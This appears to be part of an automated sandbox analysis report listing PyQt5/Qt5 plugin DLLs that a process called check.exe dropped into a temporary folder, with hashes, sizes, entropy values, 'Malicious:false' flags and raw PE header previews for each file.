                                                                                                                                                                                                                                      SHA-512:5C0A68ED27A9F1BBFF104942152E475C94BB64B03CE252EAAC1A6770E24DC4156CE4ADE99EBCD92662801262DED892C33F84C605AD84472B45A83C4883D5E767
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............h..h..h...s.h..]...h.....h..]...h..]...h..]...h......h..h..&h......h......h......h......h..Rich.h..................PE..d...X._.........." .........b......$........................................@......{v....`......................................... ................ ..X....................0......H...T......................(.......0............................................text............................... ..`.rdata...E.......F..................@..@.data...............................@....pdata..............................@..@.qtmetadi...........................@..P.rsrc...X.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\iconengines\qsvgicon.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):41968
                                                                                                                                                                                                                                      Entropy (8bit):6.0993566622860635
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:VPs5g31JfDgej5JZmA0ZsEEC6lmn+4FdDGimUf2hr:VkC31ee7ZmA+sEEC6lmn+4FOUfc
                                                                                                                                                                                                                                      MD5:313F89994F3FEA8F67A48EE13359F4BA
                                                                                                                                                                                                                                      SHA1:8C7D4509A0CAA1164CC9415F44735B885A2F3270
                                                                                                                                                                                                                                      SHA-256:42DDE60BEFCF1D9F96B8366A9988626B97D7D0D829EBEA32F756D6ECD9EA99A8
                                                                                                                                                                                                                                      SHA-512:06E5026F5DB929F242104A503F0D501A9C1DC92973DD0E91D2DAF5B277D190082DE8D37ACE7EDF643C70AA98BB3D670DEFE04CE89B483DA4F34E629F8ED5FECF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n.:*..i*..i*..i#.Ei...i...h(..i>..h(..i...h8..i...h-..i...h(..i...h-..i*..i...i...h(..i...h+..i..)i+..i...h+..iRich*..i........................PE..d......_.........." .....@...F.......F..............................................C.....`..........................................g..x...hh..........H...........................xX..T....................Z..(....X..0............P...............................text....>.......@.................. ..`.rdata...3...P...4...D..............@..@.data................x..............@....pdata...............z..............@..@.qtmetadj...........................@..P.rsrc...H...........................@..@.reloc..............................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qgif.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):39408
                                                                                                                                                                                                                                      Entropy (8bit):6.0316011626259405
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:ygk2hM0GskFtvPCjEIxh8eDzFyPddeeGvnhotdDGPUf2he:yN2a05kfPOEMaeDzFkddeFnhotOUfh
                                                                                                                                                                                                                                      MD5:52FD90E34FE8DED8E197B532BD622EF7
                                                                                                                                                                                                                                      SHA1:834E280E00BAE48A9E509A7DC909BEA3169BDCE2
                                                                                                                                                                                                                                      SHA-256:36174DD4C5F37C5F065C7A26E0AC65C4C3A41FDC0416882AF856A23A5D03BB9D
                                                                                                                                                                                                                                      SHA-512:EF3FB3770808B3690C11A18316B0C1C56C80198C1B1910E8AA198DF8281BA4E13DC9A6179BB93A379AD849304F6BB934F23E6BBD3D258B274CC31856DE0FC12B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3..3..3..KA.3..o\..3..X..3..o\..3..o\..3..o\..3.."C..3..3...3.."C..3.."C..3.."C-.3.."C..3..Rich.3..........PE..d...H._.........." .....@...B.......E...............................................^....`..........................................f..t....f..........@............~..............HW..T....................X..(....W..0............P...............................text...k?.......@.................. ..`.rdata..&)...P...*...D..............@..@.data...(............n..............@....pdata...............p..............@..@.qtmetads............v..............@..P.rsrc...@............x..............@..@.reloc...............|..............@..B........................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qicns.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):45040
                                                                                                                                                                                                                                      Entropy (8bit):6.016125225197622
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:vEip0IlhxTDxut3dnm8IyAmQQ3ydJouEAkNypTAO0tfC3apmsdDG9Uf2hU:vxvXxgVIyA23ydJlEATpTAO0tfCKpms/
                                                                                                                                                                                                                                      MD5:AD84AF4D585643FF94BFA6DE672B3284
                                                                                                                                                                                                                                      SHA1:5D2DF51028FBEB7F6B52C02ADD702BC3FA781E08
                                                                                                                                                                                                                                      SHA-256:F4A229A082D16F80016F366156A2B951550F1E9DF6D4177323BBEDD92A429909
                                                                                                                                                                                                                                      SHA-512:B68D83A4A1928EB3390DEB9340CB27B8A3EB221C2E0BE86211EF318B4DD34B37531CA347C73CCE79A640C5B06FBD325E10F8C37E0CEE2581F22ABFBFF5CC0D55
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................a....Q........Q......Q......Q......................................Rich...........PE..d......_.........." .....B...N.......G...............................................&....`.............................................t...$...........@...........................xp..T....................r..(....p..0............`...............................text....@.......B.................. ..`.rdata...9...`...:...F..............@..@.data...............................@....pdata..............................@..@.qtmetadx...........................@..P.rsrc...@...........................@..@.reloc..............................@..B........................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qico.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):38384
                                                                                                                                                                                                                                      Entropy (8bit):5.957072398645384
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:zBXBEfQiAzC9Oh5AS7a3Z5OGrTDeV9mp7nnsWdDGgYUf2hi/:8JAzuOhy3zOGrTDeV9mp7nnsWjYUfz
                                                                                                                                                                                                                                      MD5:A9ABD4329CA364D4F430EDDCB471BE59
                                                                                                                                                                                                                                      SHA1:C00A629419509929507A05AEBB706562C837E337
                                                                                                                                                                                                                                      SHA-256:1982A635DB9652304131C9C6FF9A693E70241600D2EF22B354962AA37997DE0B
                                                                                                                                                                                                                                      SHA-512:004EA8AE07C1A18B0B461A069409E4061D90401C8555DD23DBF164A08E96732F7126305134BFAF8B65B0406315F218E05B5F0F00BEDB840FB993D648CE996756
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u.G...G...G...N...C......E...S...E......R......O......D.......B...G...........D.......F.......F.......F...RichG...................PE..d...H._.........." .....4...H.......9....................................................`..........................................h..t...th..........@............z..............(X..T....................Y..(....X..0............P..8............................text....2.......4.................. ..`.rdata..B/...P...0...8..............@..@.data...h............h..............@....pdata...............l..............@..@.qtmetad.............r..............@..P.rsrc...@............t..............@..@.reloc...............x..............@..B................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qjpeg.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):421360
                                                                                                                                                                                                                                      Entropy (8bit):5.7491063936821405
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:USgOWz1eW38u9tyh6fpGUasBKTrsXWwMmH1l3JM5hn0uEfB4:USPQTnastBRB4
                                                                                                                                                                                                                                      MD5:16ABCCEB70BA20E73858E8F1912C05CD
                                                                                                                                                                                                                                      SHA1:4B3A32B166AB5BBBEE229790FDAE9CBC84F936BA
                                                                                                                                                                                                                                      SHA-256:FB4E980CB5FAFA8A4CD4239329AED93F7C32ED939C94B61FB2DF657F3C6AD158
                                                                                                                                                                                                                                      SHA-512:3E5C83967BF31C9B7F1720059DD51AA4338E518B076B0461541C781B076135E9CB9CBCEB13A8EC9217104517FBCC356BDD3FFACA7956D1C939E43988151F6273
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Iv"...L...L...L..o....L..xM...L..|M...L.......L..xI...L..xH...L..xO...L..gM...L...M...L..gH.?.L..gI...L..gL...L..g....L..gN...L.Rich..L.........PE..d...o._.........." .....b...........i...............................................g....`.............................................t...............@....`.......R..............h...T.......................(.......0...............@............................text....`.......b.................. ..`.rdata..J............f..............@..@.data...8....P.......(..............@....pdata.......`... ...*..............@..@.qtmetad.............J..............@..P.rsrc...@............L..............@..@.reloc...............P..............@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qsvg.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):32240
                                                                                                                                                                                                                                      Entropy (8bit):5.978149408776758
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:uOVKDlJJVlTuLiMtsKVG7TSdDG9Uf2h4e:hVgJVlTuL/tsKVG7TSQUfre
                                                                                                                                                                                                                                      MD5:C0DE135782FA0235A0EA8E97898EAF2A
                                                                                                                                                                                                                                      SHA1:FCF5FD99239BF4E0B17B128B0EBEC144C7A17DE2
                                                                                                                                                                                                                                      SHA-256:B3498F0A10AC4CB42CF7213DB4944A34594FF36C78C50A0F249C9085D1B1FF39
                                                                                                                                                                                                                                      SHA-512:7BD5F90CCAB3CF50C55EAF14F7EF21E05D3C893FA7AC9846C6CA98D6E6D177263AC5EB8A85A34501BCFCA0DA7F0B6C39769726F4090FCA2231EE64869B81CF0B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x>...P...P...P..a...P.&vQ...P..rQ...P.&vU...P.&vT...P.&vS...P.kiQ...P...Q.n.P.kiU...P.kiP...P.ki....P.kiR...P.Rich..P.........PE..d......_.........." .....$...B......D)....................................................`.........................................PU..t....U..........@............b...............G..T....................I..(...PH..0............@..(............................text....".......$.................. ..`.rdata...+...@...,...(..............@..@.data...8....p.......T..............@....pdata...............V..............@..@.qtmetad.............Z..............@..P.rsrc...@............\..............@..@.reloc...............`..............@..B........................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qtga.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):31728
                                                                                                                                                                                                                                      Entropy (8bit):5.865766652452823
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:1lGALluUEAQATWQ79Z2Y8Ar+dDG2vUf2hF:TZl/EH8WQ794Y8Ar+hvUfm
                                                                                                                                                                                                                                      MD5:A913276FA25D2E6FD999940454C23093
                                                                                                                                                                                                                                      SHA1:785B7BC7110218EC0E659C0E5ACE9520AA451615
                                                                                                                                                                                                                                      SHA-256:5B641DEC81AEC1CF7AC0CCE9FC067BB642FBD32DA138A36E3BDAC3BB5B36C37A
                                                                                                                                                                                                                                      SHA-512:CEBE48E6E6C5CDF8FC339560751813B8DE11D2471A3DAB7D648DF5B313D85735889D4E704E8EEC0AD1084AB43BE0EBDFBACD038AEAC46D7A951EFB3A7CE838EB
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F ._'N._'N._'N.V_.Y'N..HO.]'N.KLO.]'N..HK.M'N..HJ.W'N..HM.\'N..WO.Z'N._'O.4'N..WK.\'N..WN.^'N..W..^'N..WL.^'N.Rich_'N.........................PE..d......_.........." ....."...@.......'..............................................7.....`..........................................W..t...dX..........@.......`....`..............(I..T....................J..(....I..0............@..h............................text...[!.......".................. ..`.rdata...)...@...*...&..............@..@.data........p.......P..............@....pdata..`............T..............@..@.qtmetadu............X..............@..P.rsrc...@............Z..............@..@.reloc...............^..............@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qtiff.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):390128
                                                                                                                                                                                                                                      Entropy (8bit):5.724665470266677
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:V0jqHiFBaRe0GPAKwP15e7xrEEEEEEN024Rx/3tkYiHUASQbs/l7OanYoOgyV:0qqwP15bx/q7/yyV
                                                                                                                                                                                                                                      MD5:9C0ACF12D3D25384868DCD81C787F382
                                                                                                                                                                                                                                      SHA1:C6E877ABA3FB3D2F21D86BE300E753E23BB0B74E
                                                                                                                                                                                                                                      SHA-256:825174429CED6B3DAB18115DBC6C9DA07BF5248C86EC1BD5C0DCAECA93B4C22D
                                                                                                                                                                                                                                      SHA-512:45594FA3C5D7C4F26325927BB8D51B0B88E162E3F5E7B7F39A5D72437606383E9FDC8F83A77F814E45AFF254914514AE52C1D840A6C7B98767F362ED3F4FC5BD
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................E....q............q......q......q......<.............<......<......<......<.)....<......Rich....................PE..d......_.........." .....(..........D-.......................................0............`.............................................t...4...........@........%........... ..(....d..T................... f..(....d..0............@..0............................text....&.......(.................. ..`.rdata...v...@...x...,..............@..@.data...(...........................@....pdata...%.......&..................@..@.qtmetad............................@..P.rsrc...@...........................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qwbmp.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):30192
                                                                                                                                                                                                                                      Entropy (8bit):5.938644231596902
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:EfEM3S46JE2X/xBZ76pC5J6GdDGZUf2h4:63S3JE2PHZ76pC5J6GEUfn
                                                                                                                                                                                                                                      MD5:68919381E3C64E956D05863339F5C68C
                                                                                                                                                                                                                                      SHA1:CE0A2AD1F1A46B61CB298CEC5AA0B25FF2C12992
                                                                                                                                                                                                                                      SHA-256:0F05969FB926A62A338782B32446EA3E28E4BFBFFC0DBD25ED303FAB3404ABAC
                                                                                                                                                                                                                                      SHA-512:6222A3818157F6BCD793291A6C0380EF8C6B93ECEA2E0C9A767D9D9163461B541AFAF8C6B21C5A020F01C95C6EE9B2B74B358BA18DA120F520E87E24B20836AA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<.I.<.I.<.I.D%I.<.I.S.H.<.I.W.H.<.I.S.H.<.I.S.H.<.I.S.H.<.IYL.H.<.I.<.I.<.IYL.H.<.IYL.H.<.IYLII.<.IYL.H.<.IRich.<.I........PE..d......_.........." ..... ...8.......'....................................................`......................................... D..t....D..........@....p..T....Z...............6..T...................p8..(...@7..0............0..p............................text............ .................. ..`.rdata..d&...0...(...$..............@..@.data........`.......L..............@....pdata..T....p.......N..............@..@.qtmetad~............R..............@..P.rsrc...@............T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qwebp.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):510448
                                                                                                                                                                                                                                      Entropy (8bit):6.605517748735854
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:bPTjgdqdsvh+LrLrLrL5/y4DVHAsqx3hXS+oPZQqRaYG:jT5sMLrLrLrL5q4dAsaOFo
                                                                                                                                                                                                                                      MD5:308E4565C3C5646F9ABD77885B07358E
                                                                                                                                                                                                                                      SHA1:71CB8047A9EF0CDB3EE27428726CACD063BB95B7
                                                                                                                                                                                                                                      SHA-256:6E37ACD0D357871F92B7FDE7206C904C734CAA02F94544DF646957DF8C4987AF
                                                                                                                                                                                                                                      SHA-512:FFAEECFAE097D5E9D1186522BD8D29C95CE48B87583624EB6D0D52BD19E36DB2860A557E19F0A05847458605A9A540C2A9899D53D36A6B7FD5BF0AD86AF88124
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................a....s........s......s......s....>.........>......>.....>....>......>....Rich...................PE..d......_.........." .....B..........tH.......................................0......`q....`..........................................W..t....W..........@.......0H........... ......h...T.......................(.......0............`...............................text...[@.......B.................. ..`.rdata..J....`.......F..............@..@.data....'...........X..............@....pdata..0H.......J...\..............@..@.qtmetadv...........................@..P.rsrc...@...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\platforms\qminimal.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):844784
                                                                                                                                                                                                                                      Entropy (8bit):6.625808732261156
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:y6MhioHKQ1ra8HT+bkMY8zKI4kwU7dFOTTYfEWmTxbwTlWc:BMhioHKQp+bkjAjwGdFSZtbwBd
                                                                                                                                                                                                                                      MD5:2F6D88F8EC3047DEAF174002228219AB
                                                                                                                                                                                                                                      SHA1:EB7242BB0FE74EA78A17D39C76310A7CDD1603A8
                                                                                                                                                                                                                                      SHA-256:05D1E7364DD2A672DF3CA44DD6FD85BED3D3DC239DCFE29BFB464F10B4DAA628
                                                                                                                                                                                                                                      SHA-512:0A895BA11C81AF14B5BD1A04A450D6DCCA531063307C9EF076E9C47BD15F4438837C5D425CAEE2150F3259691F971D6EE61154748D06D29E4E77DA3110053B54
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#\..B2..B2..B2..:...B2..-3..B2.F....B2..-7..B2..-6..B2..-1..B2..)6..B2.^23..B2..)3..B2..B3.@2.^26..B2.^27..B2.^22..B2.^2...B2.^20..B2.Rich.B2.........PE..d...N._.........." ......................................................... ............`......................................... ...x.......@.......H....`..H.......................T.......................(.......0...............(............................text...;........................... ..`.rdata...C.......D..................@..@.data...H....@......."..............@....pdata..H....`.......0..............@..@.qtmetad............................@..P.rsrc...H...........................@..@.reloc..............................@..B................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\platforms\qoffscreen.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):754672
                                                                                                                                                                                                                                      Entropy (8bit):6.6323155845799695
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:/HpBmyVIRZ3Tck83vEgex5aebusGMIlhLfEWmpCJkl:/HpB63TckUcLaHMITAZmW
                                                                                                                                                                                                                                      MD5:6407499918557594916C6AB1FFEF1E99
                                                                                                                                                                                                                                      SHA1:5A57C6B3FFD51FC5688D5A28436AD2C2E70D3976
                                                                                                                                                                                                                                      SHA-256:54097626FAAE718A4BC8E436C85B4DED8F8FB7051B2B9563A29AEE4ED5C32B7B
                                                                                                                                                                                                                                      SHA-512:8E8ABB563A508E7E75241B9720A0E7AE9C1A59DD23788C74E4ED32A028721F56546792D6CCA326F3D6AA0A62FDEDC63BF41B8B74187215CD3B26439F40233F4D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m..T..KT..KT..K]t7K@..K.c.JV..K@g.JV..K.cKU..K.c.JA..K.c.J\..K.c.JP..K.|.JQ..KT..K...K.|.Js..K.|.JS..K.|.JU..K.|[KU..K.|.JU..KRichT..K........PE..d...R._.........." ................L.....................................................`.............................................x...8...........H....... s...h..........p.......T................... ...(.......0...............@............................text............................... ..`.rdata..............................@..@.data...............................@....pdata.. s.......t..................@..@.qtmetad.............T..............@..P.rsrc...H............V..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\platforms\qwebgl.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):482288
                                                                                                                                                                                                                                      Entropy (8bit):6.152380961313931
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:WO/vyK+DtyaHlIMDhg5WEOvAwKB2VaaHeqRw/yVfYu4UnCA6DEjeYchcD+1Zy2:bKtHOWg5OvAwK0NYu4AShcD+1U2
                                                                                                                                                                                                                                      MD5:1EDCB08C16D30516483A4CBB7D81E062
                                                                                                                                                                                                                                      SHA1:4760915F1B90194760100304B8469A3B2E97E2BC
                                                                                                                                                                                                                                      SHA-256:9C3B2FA2383EEED92BB5810BDCF893AE30FA654A30B453AB2E49A95E1CCF1631
                                                                                                                                                                                                                                      SHA-512:0A923495210B2DC6EB1ACEDAF76D57B07D72D56108FD718BD0368D2C2E78AE7AC848B90D90C8393320A3D800A38E87796965AFD84DA8C1DF6C6B244D533F0F39
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........gM..#...#...#..~....#.ei&...#.ei'...#.ei ...#..m'...#.ei"...#.(v"...#..m"...#..."...#.(v&...#.(v#...#.(v...#.(v!...#.Rich..#.................PE..d......_.........." .....R...........;....................................................`..........................................m..t...Dn..T.......@....@...=...@..............0...T.......................(.......0............p..(............................text...{Q.......R.................. ..`.rdata..:....p.......V..............@..@.data...H....0......................@....pdata...=...@...>..................@..@.qtmetadz............2..............@..P.rsrc...@............4..............@..@.reloc...............8..............@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\platforms\qwindows.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1477104
                                                                                                                                                                                                                                      Entropy (8bit):6.575113537540671
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:4mCSPJrAbXEEuV9Hw2SoYFo3HdxjEgqJkLdLu5qpmZuhg/A2b:nPlIEEuV9Hw2SFFWHdWZsdmqja/A2b
                                                                                                                                                                                                                                      MD5:4931FCD0E86C4D4F83128DC74E01EAAD
                                                                                                                                                                                                                                      SHA1:AC1D0242D36896D4DDA53B95812F11692E87D8DF
                                                                                                                                                                                                                                      SHA-256:3333BA244C97264E3BD19DB5953EFA80A6E47AACED9D337AC3287EC718162B85
                                                                                                                                                                                                                                      SHA-512:0396BCCDA43856950AFE4E7B16E0F95D4D48B87473DC90CF029E6DDFD0777E1192C307CFE424EAE6FB61C1B479F0BA1EF1E4269A69C843311A37252CF817D84D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......i...-...-...-...$.%.9.....q.,......8......%......)......+...9......9..,......)..........9..8...-..........d......,.....I.,......,...Rich-...........PE..d....._.........." .....,...h......4+..............................................n.....`.............................................x...(...........H............n..........X....r..T...................Pt..(... s..0............@...5...........................text..._+.......,.................. ..`.rdata.......@.......0..............@..@.data....m...@...D...(..............@....pdata...............l..............@..@.qtmetad.............J..............@..P.rsrc...H............L..............@..@.reloc..X............P..............@..B........................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):68592
                                                                                                                                                                                                                                      Entropy (8bit):6.125954940500008
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:Nt4B1RLj3S6TtH2sweUH+Hz6/4+D6VFsfvUfO:AB1RHFdoeUs6/4O6VFSZ
                                                                                                                                                                                                                                      MD5:F66F6E9EDA956F72E3BB113407035E61
                                                                                                                                                                                                                                      SHA1:97328524DA8E82F5F92878F1C0421B38ECEC1E6C
                                                                                                                                                                                                                                      SHA-256:E23FBC1BEC6CEEDFA9FD305606A460D9CAC5D43A66D19C0DE36E27632FDDD952
                                                                                                                                                                                                                                      SHA-512:7FF76E83C8D82016AB6BD349F10405F30DEEBE97E8347C6762EB71A40009F9A2978A0D8D0C054CF7A3D2D377563F6A21B97DDEFD50A9AC932D43CC124D7C4918
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
